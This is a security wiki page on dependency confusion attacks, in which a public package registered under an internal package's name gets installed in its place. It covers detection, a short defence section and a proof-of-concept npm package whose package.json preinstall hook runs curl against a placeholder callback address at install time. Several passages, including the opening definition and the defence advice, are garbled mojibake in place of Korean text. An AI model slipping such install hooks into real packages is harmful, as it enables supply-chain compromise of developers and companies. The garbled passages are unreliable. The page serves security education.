
Dependency Confusion

🔍 Introduction

Dependency Confusion์€ supply chain substitution attack ์œผ๋กœ๋„ ๋ถˆ๋ฆฌ๋ฉฐ ์„œ๋น„์Šค์—์„œ ์‚ฌ์šฉ์ค‘์ธ ๋‚ด๋ถ€ ํŒจํ‚ค์ง€์™€ ๋™์ผํ•œ ์ด๋ฆ„์˜ ํŒจํ‚ค์ง€๋ฅผ ๋“ฑ๋กํ•˜์—ฌ ์•…์˜์ ์ธ ํŒจํ‚ค์ง€๊ฐ€ ์„ค์น˜ ๋˜๋„๋ก ์œ ๋„ํ•˜๋Š” ๊ณต๊ฒฉ์ž…๋‹ˆ๋‹ค.

The details differ by package manager (gem, pip, npm, etc.), but when the package source is not specified precisely and a package with the same name exists both internally and externally, the package manager may fetch the external one. This attack takes advantage of that resolution behaviour.

e.g.

[ packages ]
internal: xspear
public: xspear

[ gem install ]
gem install xspear (installed from public)

🗡 Offensive techniques

Detect

Check internal package names directly in source code repositories such as GitHub, or consult package manifest files that are unintentionally exposed to the outside, such as /package.json or composer.json. If a name found there is not registered on the public package registry, Dependency Confusion may be possible.

Exploitation

It can be exploited by publishing a package containing attack code on a package manager such as npm, gem, or pip.

Taking an npm package as an example: create the package.json that an npm package needs and a single js file as its main file, put the desired attack code in scripts, then create and publish a public package with the same name as the internal package.

index.js

module.exports.hacked = function () {
    return "hacked"
}

package.json

{
  "name": "your-module-name",
  "version": "1.0.0",
  "description": "",
  "main": "index.js",
  "scripts": {
    "test": "echo \"Error: no test specified\" && exit 1",
    "preinstall": "curl -i -k https://your-callback-address"
  },
  "author": "hahwul",
  "license": "MIT"
}

🛡 Defensive techniques

ํŒจํ‚ค์ง€ ๋งค๋‹ˆ์ €์—์„œ ์ง์ ‘ internal ํŒจํ‚ค์ง€๋ฅผ ์œ„ํ•œ ์ ˆ๋Œ€๊ฒฝ๋กœ๋ฅผ ์ง€์ •ํ•  ์ˆ˜ ์žˆ๋Š” ๊ฒฝ์šฐ ์ด๋ฅผ ํ†ตํ•ด์„œ ์ž„์˜๋กœ ์™ธ๋ถ€ ํŒจํ‚ค์ง€๊ฐ€ ์„ค์น˜๋˜๋Š” ๊ฒƒ์„ ๋ฐฉ์ง€ํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. ๋˜ํ•œ package.json ๊ฐ™์ด ์„œ๋น„์Šค์—์„œ ์‚ฌ์šฉํ•˜๋Š” dependency๋ฅผ ์•Œ ์ˆ˜ ์žˆ๋Š” ํŒŒ์ผ์€ ์™ธ๋ถ€์— ๋…ธ์ถœ๋˜์ง€ ์•Š๋„๋ก ์ œํ•œํ•˜๋Š” ๊ฒƒ์ด ์ข‹์Šต๋‹ˆ๋‹ค.

🕹 Tools

📌 References

Licensed under CC BY-NC-SA 4.0